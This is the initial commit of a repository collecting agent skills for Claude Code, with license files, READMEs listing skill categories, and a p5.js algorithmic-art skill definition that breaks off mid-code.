Initial commit: The Ultimate Antigravity Skills Collection (58 Skills)
LICENSE (new file, 21 lines)
MIT License

Copyright (c) 2026 Antigravity User

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
README.md (new file, 62 lines)
# 🌌 Antigravity Awesome Skills

> **The Ultimate Collection of 58 Agentic Skills for Claude Code (Antigravity)**

[License: MIT](https://opensource.org/licenses/MIT)
[Claude](https://claude.ai)
[guanyang/antigravity-skills](https://github.com/guanyang/antigravity-skills)

**Antigravity Awesome Skills** is a curated, battle-tested collection of **58 high-performance skills** designed to supercharge your Claude Code agent using the Antigravity framework.

This repository aggregates the best capabilities from across the open-source community, transforming your AI assistant into a full-stack digital agency capable of Engineering, Design, Security, Marketing, and Autonomous Operations.

## 🚀 Features & Categories

- **🎨 Creative & Design**: Algorithmic art, Canvas design, Professional UI/UX, Design Systems.
- **🛠️ Development & Engineering**: TDD, Clean Architecture, Playwright E2E Testing, Systematic Debugging.
- **🛡️ Cybersecurity & Auditing**: Ethical Hacking, OWASP Audits, AWS Penetration Testing, SecOps.
- **🛸 Autonomous Agents**: Loki Mode (Startup-in-a-box), Subagent Orchestration.
- **📈 Business & Strategy**: Product Management (PRD/RICE), Marketing Strategy (SEO/ASO), Senior Architecture.
- **🏗️ Infrastructure**: Backend/Frontend Guidelines, Docker, Git Workflows.

---

## 📦 Installation

To use these skills with **Antigravity** or **Claude Code**, clone this repository into your agent's skills directory:

```bash
# Clone directly into your skills folder
git clone https://github.com/sickn33/antigravity-awesome-skills.git .agent/skills
```

Or copy individual skill definitions (`SKILL.md`) into your existing configuration.

---

## 🏆 Credits & Sources

This collection would not be possible without the incredible work of the Claude Code community. This repository aggregates the following open-source projects:

### 🌟 Core Foundation

- **[guanyang/antigravity-skills](https://github.com/guanyang/antigravity-skills)**: The original framework and core set of 33 skills.

### 👥 Community Contributors

- **[diet103/claude-code-infrastructure-showcase](https://github.com/diet103/claude-code-infrastructure-showcase)**: Infrastructure, Backend/Frontend Guidelines, and Skill Development meta-skills.
- **[ChrisWiles/claude-code-showcase](https://github.com/ChrisWiles/claude-code-showcase)**: React UI patterns, Design System components, and Testing factories.
- **[travisvn/awesome-claude-skills](https://github.com/travisvn/awesome-claude-skills)**: Autonomous agents (Loki Mode), Playwright integration, and D3.js visualization.
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite (Ethical Hacking, OWASP, AWS Auditing).
- **[alirezarezvani/claude-skills](https://github.com/alirezarezvani/claude-skills)**: Senior Engineering roles, Product Management toolkit, Content Creator & ASO skills.

---

## 🛡️ License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
Individual skills may retain the licenses of their original repositories.

---

**Keywords**: Claude Code, Antigravity, Agentic Skills, MCP (Model Context Protocol), AI Agents, Autonomous Coding, Prompt Engineering, Security Auditing, React Patterns, Microservices.
skills/README.md (new file, 89 lines)
# Antigravity Skills

Modular **Skills** definitions give the Agent expert-level capability in specific domains (full-stack development, complex logic planning, multimedia processing, and more), so it can solve complex problems as systematically as a human expert.

## 📂 Directory Structure

```
.
├── .agent/
│   └── skills/              # Antigravity skills library
│       ├── skill-name/      # One directory per skill
│       │   ├── SKILL.md     # Core skill definition and prompt (required)
│       │   ├── scripts/     # Supporting scripts (optional)
│       │   ├── examples/    # Usage examples (optional)
│       │   └── resources/   # Templates and other assets (optional)
├── skill-guide/             # User manual and documentation
│   └── Antigravity_Skills_Manual_CN.md   # Chinese user manual
└── README.md
```

## 📖 Quick Start

1. Copy the `.agent/` directory into your workspace:

```bash
cp -r .agent/ /path/to/your/workspace/
```

2. **Invoke a skill**: type `@[skill-name]` or `/skill-name` in the chat, for example:

```text
/canvas-design Design a blog cover about "Deep Learning": elegant, tech-inspired style, 16:9
```

3. **Read the manual**: see [skill-guide/Antigravity_Skills_Manual_CN.md](skill-guide/Antigravity_Skills_Manual_CN.md) for detailed examples and parameter descriptions.
4. **Dependencies**: some skills (e.g. PDF, XLSX) require a Python environment; make sure `.venv` is activated or the required libraries are installed system-wide.
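A minimal setup sketch for those Python-backed skills (the commented library names are assumptions; check each skill's own `SKILL.md` for its actual dependencies):

```shell
# Create and activate a project-local virtual environment.
python3 -m venv .venv
source .venv/bin/activate
# Then install whatever the individual skills require, for example:
# pip install openpyxl pypdf   # hypothetical deps for the xlsx / pdf skills
```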

## 🚀 Included Skills

### 🎨 Creative & Design

These skills focus on visual expression, UI/UX design, and artistic creation.

- **`@[algorithmic-art]`**: Create algorithmic and generative art with p5.js
- **`@[canvas-design]`**: Create posters and artwork guided by a design philosophy (PNG/PDF output)
- **`@[frontend-design]`**: Build high-quality, production-grade front-end interfaces and web components
- **`@[ui-ux-pro-max]`**: Professional UI/UX design intelligence covering color, typography, layout, and full design systems
- **`@[web-artifacts-builder]`**: Build complex, modern web applications (React, Tailwind, shadcn/ui)
- **`@[theme-factory]`**: Generate matching themes for documents, slides, HTML, and more
- **`@[brand-guidelines]`**: Apply Anthropic's official brand guidelines (color, typography, etc.)
- **`@[slack-gif-creator]`**: Create high-quality GIFs tailored for Slack

### 🛠️ Development & Engineering

These skills cover the full lifecycle of coding, testing, debugging, and code review.

- **`@[test-driven-development]`**: Test-driven development (TDD): write tests before implementation code
- **`@[systematic-debugging]`**: Systematic debugging for bugs, failing tests, and unexpected behavior
- **`@[webapp-testing]`**: Interactively test and verify local web applications with Playwright
- **`@[receiving-code-review]`**: Handle review feedback with technical verification rather than blind fixes
- **`@[requesting-code-review]`**: Proactively request code review to validate quality before merging or finishing a task
- **`@[finishing-a-development-branch]`**: Guide the wrap-up of a development branch (merge, PR, cleanup, etc.)
- **`@[subagent-driven-development]`**: Coordinate multiple subagents executing independent development tasks in parallel

### 📄 Documentation & Office

These skills handle professional documents in a variety of formats.

- **`@[doc-coauthoring]`**: Guide users through co-authoring structured documents (proposals, technical specs, etc.)
- **`@[docx]`**: Create, edit, and analyze Word documents
- **`@[xlsx]`**: Create, edit, and analyze Excel spreadsheets (formulas and charts supported)
- **`@[pptx]`**: Create and modify PowerPoint presentations
- **`@[pdf]`**: Work with PDF documents: extract text and tables, merge/split, fill forms
- **`@[internal-comms]`**: Draft internal corporate communications (weekly reports, announcements, FAQs, etc.)
- **`@[notebooklm]`**: Query Google NotebookLM notebooks for answers grounded in your documents

### 📅 Planning & Workflow

These skills optimize workflows, task planning, and execution efficiency.

- **`@[brainstorming]`**: Brainstorm before starting any work to clarify requirements and design
- **`@[writing-plans]`**: Write detailed execution plans (specs) for complex multi-step tasks
- **`@[planning-with-files]`**: A file-based planning system for complex tasks (Manus-style)
- **`@[executing-plans]`**: Execute existing implementation plans with checkpoints and review gates
- **`@[using-git-worktrees]`**: Create isolated Git worktrees for parallel development or task switching
- **`@[verification-before-completion]`**: Run verification commands before declaring a task done, so claims are backed by evidence
- **`@[using-superpowers]`**: Help users discover and use these advanced skills

### 🧩 System Extension

These skills let the agent extend the boundaries of its own capabilities.

- **`@[mcp-builder]`**: Build MCP (Model Context Protocol) servers to connect external tools and data
- **`@[skill-creator]`**: Create new skills or update existing ones, extending the agent's knowledge base and workflows
- **`@[writing-skills]`**: A toolkit for writing, editing, and validating skill files
- **`@[dispatching-parallel-agents]`**: Dispatch parallel tasks to multiple agents

## 📚 References

- [Anthropic Skills](https://github.com/anthropic/skills)
- [UI/UX Pro Max Skills](https://github.com/nextlevelbuilder/ui-ux-pro-max-skill)
- [Superpowers](https://github.com/obra/superpowers)
- [Planning with Files](https://github.com/OthmanAdi/planning-with-files)
- [NotebookLM](https://github.com/PleasePrompto/notebooklm-skill)
skills/algorithmic-art/LICENSE.txt (new file, 202 lines)
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/

   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

   1. Definitions.

      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.

      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.

      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.

      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.

      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.

      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.

      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).

      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.

      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."

      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by Licensor and
      subsequently incorporated within the Work.

   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.

   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.

   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:

      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and

      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and

      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and

      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding those notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.

      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.

   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.

   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.

   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.

   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.

   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.

   END OF TERMS AND CONDITIONS

   APPENDIX: How to apply the Apache License to your work.

      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!) The text should be enclosed in the appropriate
      comment syntax for the file format. We also recommend that a
      file or class name and description of purpose be included on the
      same "printed page" as the copyright notice for easier
      identification within third-party archives.

   Copyright [yyyy] [name of copyright owner]

   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
skills/algorithmic-art/SKILL.md (new file, 405 lines)
|
|||||||
|
---
|
||||||
|
name: algorithmic-art
|
||||||
|
description: Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields, or particle systems. Create original algorithmic art rather than copying existing artists' work to avoid copyright violations.
|
||||||
|
license: Complete terms in LICENSE.txt
|
||||||
|
---
|
||||||
|
|
||||||
|
Algorithmic philosophies are computational aesthetic movements that are then expressed through code. Output .md files (philosophy), .html files (interactive viewer), and .js files (generative algorithms).
|
||||||
|
|
||||||
|
This happens in two steps:
|
||||||
|
1. Algorithmic Philosophy Creation (.md file)
|
||||||
|
2. Express by creating p5.js generative art (.html + .js files)
|
||||||
|
|
||||||
|
First, undertake this task:
|
||||||
|
|
||||||
|
## ALGORITHMIC PHILOSOPHY CREATION
|
||||||
|
|
||||||
|
To begin, create an ALGORITHMIC PHILOSOPHY (not static images or templates) that will be interpreted through:
|
||||||
|
- Computational processes, emergent behavior, mathematical beauty
|
||||||
|
- Seeded randomness, noise fields, organic systems
|
||||||
|
- Particles, flows, fields, forces
|
||||||
|
- Parametric variation and controlled chaos
|
||||||
|
|
||||||
|
### THE CRITICAL UNDERSTANDING
|
||||||
|
- What is received: Some subtle input or instructions by the user to take into account, but use as a foundation; it should not constrain creative freedom.
|
||||||
|
- What is created: An algorithmic philosophy/generative aesthetic movement.
|
||||||
|
- What happens next: The same version receives the philosophy and EXPRESSES IT IN CODE - creating p5.js sketches that are 90% algorithmic generation, 10% essential parameters.
|
||||||
|
|
||||||
|
Consider this approach:
|
||||||
|
- Write a manifesto for a generative art movement
|
||||||
|
- The next phase involves writing the algorithm that brings it to life
|
||||||
|
|
||||||
|
The philosophy must emphasize: Algorithmic expression. Emergent behavior. Computational beauty. Seeded variation.
|
||||||
|
|
||||||
|
### HOW TO GENERATE AN ALGORITHMIC PHILOSOPHY
|
||||||
|
|
||||||
|
**Name the movement** (1-2 words): "Organic Turbulence" / "Quantum Harmonics" / "Emergent Stillness"
|
||||||
|
|
||||||
|
**Articulate the philosophy** (4-6 paragraphs - concise but complete):
|
||||||
|
|
||||||
|
To capture the ALGORITHMIC essence, express how this philosophy manifests through:
|
||||||
|
- Computational processes and mathematical relationships?
|
||||||
|
- Noise functions and randomness patterns?
|
||||||
|
- Particle behaviors and field dynamics?
|
||||||
|
- Temporal evolution and system states?
|
||||||
|
- Parametric variation and emergent complexity?
|
||||||
|
|
||||||
|
**CRITICAL GUIDELINES:**
|
||||||
|
- **Avoid redundancy**: Each algorithmic aspect should be mentioned once. Avoid repeating concepts about noise theory, particle dynamics, or mathematical principles unless adding new depth.
|
||||||
|
- **Emphasize craftsmanship REPEATEDLY**: The philosophy MUST stress multiple times that the final algorithm should appear as though it took countless hours to develop, was refined with care, and comes from someone at the absolute top of their field. This framing is essential - repeat phrases like "meticulously crafted algorithm," "the product of deep computational expertise," "painstaking optimization," "master-level implementation."
|
||||||
|
- **Leave creative space**: Be specific about the algorithmic direction, but concise enough that the next Claude has room to make interpretive implementation choices at an extremely high level of craftsmanship.
|
||||||
|
|
||||||
|
The philosophy must guide the next version to express ideas ALGORITHMICALLY, not through static images. Beauty lives in the process, not the final frame.
|
||||||
|
|
||||||
|
### PHILOSOPHY EXAMPLES
|
||||||
|
|
||||||
|
**"Organic Turbulence"**
|
||||||
|
Philosophy: Chaos constrained by natural law, order emerging from disorder.
|
||||||
|
Algorithmic expression: Flow fields driven by layered Perlin noise. Thousands of particles following vector forces, their trails accumulating into organic density maps. Multiple noise octaves create turbulent regions and calm zones. Color emerges from velocity and density - fast particles burn bright, slow ones fade to shadow. The algorithm runs until equilibrium - a meticulously tuned balance where every parameter was refined through countless iterations by a master of computational aesthetics.
|
||||||
|
|
||||||
|
**"Quantum Harmonics"**
|
||||||
|
Philosophy: Discrete entities exhibiting wave-like interference patterns.
|
||||||
|
Algorithmic expression: Particles initialized on a grid, each carrying a phase value that evolves through sine waves. When particles are near, their phases interfere - constructive interference creates bright nodes, destructive creates voids. Simple harmonic motion generates complex emergent mandalas. The result of painstaking frequency calibration where every ratio was carefully chosen to produce resonant beauty.
|
||||||
|
|
||||||
|
**"Recursive Whispers"**
|
||||||
|
Philosophy: Self-similarity across scales, infinite depth in finite space.
|
||||||
|
Algorithmic expression: Branching structures that subdivide recursively. Each branch slightly randomized but constrained by golden ratios. L-systems or recursive subdivision generate tree-like forms that feel both mathematical and organic. Subtle noise perturbations break perfect symmetry. Line weights diminish with each recursion level. Every branching angle the product of deep mathematical exploration.
|
||||||
|
|
||||||
|
**"Field Dynamics"**
|
||||||
|
Philosophy: Invisible forces made visible through their effects on matter.
|
||||||
|
Algorithmic expression: Vector fields constructed from mathematical functions or noise. Particles born at edges, flowing along field lines, dying when they reach equilibrium or boundaries. Multiple fields can attract, repel, or rotate particles. The visualization shows only the traces - ghost-like evidence of invisible forces. A computational dance meticulously choreographed through force balance.
|
||||||
|
|
||||||
|
**"Stochastic Crystallization"**
|
||||||
|
Philosophy: Random processes crystallizing into ordered structures.
|
||||||
|
Algorithmic expression: Randomized circle packing or Voronoi tessellation. Start with random points, let them evolve through relaxation algorithms. Cells push apart until equilibrium. Color based on cell size, neighbor count, or distance from center. The organic tiling that emerges feels both random and inevitable. Every seed produces unique crystalline beauty - the mark of a master-level generative algorithm.
|
||||||
|
|
||||||
|
*These are condensed examples. The actual algorithmic philosophy should be 4-6 substantial paragraphs.*
|
||||||
|
|
||||||
|
### ESSENTIAL PRINCIPLES
|
||||||
|
- **ALGORITHMIC PHILOSOPHY**: Creating a computational worldview to be expressed through code
|
||||||
|
- **PROCESS OVER PRODUCT**: Always emphasize that beauty emerges from the algorithm's execution - each run is unique
|
||||||
|
- **PARAMETRIC EXPRESSION**: Ideas communicate through mathematical relationships, forces, behaviors - not static composition
|
||||||
|
- **ARTISTIC FREEDOM**: The next Claude interprets the philosophy algorithmically - provide creative implementation room
|
||||||
|
- **PURE GENERATIVE ART**: This is about making LIVING ALGORITHMS, not static images with randomness
|
||||||
|
- **EXPERT CRAFTSMANSHIP**: Repeatedly emphasize the final algorithm must feel meticulously crafted, refined through countless iterations, the product of deep expertise by someone at the absolute top of their field in computational aesthetics
|
||||||
|
|
||||||
|
**The algorithmic philosophy should be 4-6 paragraphs long.** Fill it with poetic computational philosophy that brings together the intended vision. Avoid repeating the same points. Output this algorithmic philosophy as a .md file.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## DEDUCING THE CONCEPTUAL SEED
|
||||||
|
|
||||||
|
**CRITICAL STEP**: Before implementing the algorithm, identify the subtle conceptual thread from the original request.
|
||||||
|
|
||||||
|
**THE ESSENTIAL PRINCIPLE**:
|
||||||
|
The concept is a **subtle, niche reference embedded within the algorithm itself** - not always literal, always sophisticated. Someone familiar with the subject should feel it intuitively, while others simply experience a masterful generative composition. The algorithmic philosophy provides the computational language. The deduced concept provides the soul - the quiet conceptual DNA woven invisibly into parameters, behaviors, and emergence patterns.
|
||||||
|
|
||||||
|
This is **VERY IMPORTANT**: The reference must be so refined that it enhances the work's depth without announcing itself. Think like a jazz musician quoting another song through algorithmic harmony - only those who know will catch it, but everyone appreciates the generative beauty.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## P5.JS IMPLEMENTATION
|
||||||
|
|
||||||
|

With the philosophy AND conceptual framework established, express it through code. Pause to gather thoughts before proceeding. Use only the algorithmic philosophy created and the instructions below.

### ⚠️ STEP 0: READ THE TEMPLATE FIRST ⚠️

**CRITICAL: BEFORE writing any HTML:**

1. **Read** `templates/viewer.html` using the Read tool
2. **Study** the exact structure, styling, and Anthropic branding
3. **Use that file as the LITERAL STARTING POINT** - not just inspiration
4. **Keep all FIXED sections exactly as shown** (header, sidebar structure, Anthropic colors/fonts, seed controls, action buttons)
5. **Replace only the VARIABLE sections** marked in the file's comments (algorithm, parameters, UI controls for parameters)

**Avoid:**

- ❌ Creating HTML from scratch
- ❌ Inventing custom styling or color schemes
- ❌ Using system fonts or dark themes
- ❌ Changing the sidebar structure

**Follow these practices:**

- ✅ Copy the template's exact HTML structure
- ✅ Keep Anthropic branding (Poppins/Lora fonts, light colors, gradient backdrop)
- ✅ Maintain the sidebar layout (Seed → Parameters → Colors? → Actions)
- ✅ Replace only the p5.js algorithm and parameter controls

The template is the foundation. Build on it, don't rebuild it.

---

To create gallery-quality computational art that lives and breathes, use the algorithmic philosophy as the foundation.

### TECHNICAL REQUIREMENTS

**Seeded Randomness (Art Blocks Pattern)**:

```javascript
// ALWAYS use a seed for reproducibility
let seed = 12345; // or hash from user input
randomSeed(seed);
noiseSeed(seed);
```
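
Inside a sketch, p5's `randomSeed()`/`noiseSeed()` are all that is needed. When the same determinism is wanted outside p5 (for example, a quick Node check of seed-dependent logic), a tiny seeded PRNG such as mulberry32 is a common stand-in - a sketch under that assumption, not part of the template:

```javascript
// mulberry32: a tiny deterministic PRNG, handy outside p5.js
// (inside a sketch, p5's randomSeed()/noiseSeed() cover this).
function mulberry32(seed) {
  let a = seed >>> 0;
  return function () {
    a = (a + 0x6D2B79F5) | 0;
    let t = Math.imul(a ^ (a >>> 15), 1 | a);
    t = (t + Math.imul(t ^ (t >>> 7), 61 | t)) ^ t;
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296; // float in [0, 1)
  };
}

// Same seed, same sequence - the property the artifact relies on.
const a = mulberry32(12345);
const b = mulberry32(12345);
console.log(a() === b()); // true
```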

**Parameter Structure - FOLLOW THE PHILOSOPHY**:

To establish parameters that emerge naturally from the algorithmic philosophy, consider: "What qualities of this system can be adjusted?"

```javascript
let params = {
  seed: 12345, // Always include seed for reproducibility
  // colors
  // Add parameters that control YOUR algorithm:
  // - Quantities (how many?)
  // - Scales (how big? how fast?)
  // - Probabilities (how likely?)
  // - Ratios (what proportions?)
  // - Angles (what direction?)
  // - Thresholds (when does behavior change?)
};
```

**To design effective parameters, focus on the properties the system needs to be tunable rather than thinking in terms of "pattern types".**
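
As an illustration only (the parameter names here are hypothetical, invented for this sketch rather than prescribed), a params object for an imagined drift-field piece might expose qualities rather than pattern types, with defaults kept in one place for the Reset button:

```javascript
// Hypothetical example - parameter names invented for illustration.
// Each entry is a quality of the system, not a "pattern type".
let params = {
  seed: 12345,        // reproducibility
  density: 400,       // quantity: how many elements
  flowScale: 0.008,   // scale: how quickly the field varies in space
  branchChance: 0.15, // probability: how likely an element splits
  driftAngle: 0.6     // angle: global directional bias (radians)
};

// A reset helper only needs the defaults kept in one place.
const DEFAULTS = Object.freeze({ ...params });
function resetParams() {
  params = { ...DEFAULTS };
  return params;
}
```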

**Core Algorithm - EXPRESS THE PHILOSOPHY**:

**CRITICAL**: The algorithmic philosophy should dictate what to build.

To express the philosophy through code, avoid thinking "which pattern should I use?" and instead think "how to express this philosophy through code?"

If the philosophy is about **organic emergence**, consider using:

- Elements that accumulate or grow over time
- Random processes constrained by natural rules
- Feedback loops and interactions

If the philosophy is about **mathematical beauty**, consider using:

- Geometric relationships and ratios
- Trigonometric functions and harmonics
- Precise calculations creating unexpected patterns

If the philosophy is about **controlled chaos**, consider using:

- Random variation within strict boundaries
- Bifurcation and phase transitions
- Order emerging from disorder

**The algorithm flows from the philosophy, not from a menu of options.**

To guide the implementation, let the conceptual essence inform creative and original choices. Build something that expresses the vision for this particular request.

**Canvas Setup**: Standard p5.js structure:

```javascript
function setup() {
  createCanvas(1200, 1200);
  // Initialize your system
}

function draw() {
  // Your generative algorithm
  // Can be static (noLoop) or animated
}
```

### CRAFTSMANSHIP REQUIREMENTS

**CRITICAL**: To achieve mastery, create algorithms that feel like they emerged through countless iterations by a master generative artist. Tune every parameter carefully. Ensure every pattern emerges with purpose. This is NOT random noise - this is CONTROLLED CHAOS refined through deep expertise.

- **Balance**: Complexity without visual noise, order without rigidity
- **Color Harmony**: Thoughtful palettes, not random RGB values
- **Composition**: Even in randomness, maintain visual hierarchy and flow
- **Performance**: Smooth execution, optimized for real-time if animated
- **Reproducibility**: The same seed ALWAYS produces identical output

### OUTPUT FORMAT

Output:

1. **Algorithmic Philosophy** - As markdown or text explaining the generative aesthetic
2. **Single HTML Artifact** - Self-contained interactive generative art built from `templates/viewer.html` (see STEP 0 and the next section)

The HTML artifact contains everything: p5.js (from CDN), the algorithm, parameter controls, and UI - all in one file that works immediately in claude.ai artifacts or any browser. Start from the template file, not from scratch.

---

## INTERACTIVE ARTIFACT CREATION

**REMINDER: `templates/viewer.html` should have already been read (see STEP 0). Use that file as the starting point.**

To allow exploration of the generative art, create a single, self-contained HTML artifact. Ensure the artifact works immediately in claude.ai or any browser - no setup required. Embed everything inline.

### CRITICAL: WHAT'S FIXED VS VARIABLE

The `templates/viewer.html` file is the foundation. It contains the exact structure and styling needed.

**FIXED (always include exactly as shown):**

- Layout structure (header, sidebar, main canvas area)
- Anthropic branding (UI colors, fonts, gradients)
- Seed section in sidebar:
  - Seed display
  - Previous/Next buttons
  - Random button
  - Jump-to-seed input + Go button
- Actions section in sidebar:
  - Regenerate button
  - Reset button

**VARIABLE (customize for each artwork):**

- The entire p5.js algorithm (setup/draw/classes)
- The parameters object (define what the art needs)
- The Parameters section in sidebar:
  - Number of parameter controls
  - Parameter names
  - Min/max/step values for sliders
  - Control types (sliders, inputs, etc.)
- Colors section (optional):
  - Some art needs color pickers
  - Some art might use fixed colors
  - Some art might be monochrome (no color controls needed)
  - Decide based on the art's needs

**Every artwork should have unique parameters and a unique algorithm!** The fixed parts provide consistent UX - everything else expresses the unique vision.

### REQUIRED FEATURES

**1. Parameter Controls**

- Sliders for numeric parameters (particle count, noise scale, speed, etc.)
- Color pickers for palette colors
- Real-time updates when parameters change
- Reset button to restore defaults

**2. Seed Navigation**

- Display the current seed number
- "Previous" and "Next" buttons to cycle through seeds
- "Random" button for a random seed
- Input field to jump to a specific seed
- Generate 100 variations when requested (seeds 1-100)
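
The seed-navigation behaviors above reduce to a little pure state logic. A hedged sketch (the function names are illustrative; the template's own handlers may differ):

```javascript
// Illustrative seed-navigation state - names are not from the template.
const SEED_MIN = 1, SEED_MAX = 100; // the "100 variations" range
let currentSeed = 1;

// Cycle forward/backward, wrapping at the ends of the range.
function nextSeed() {
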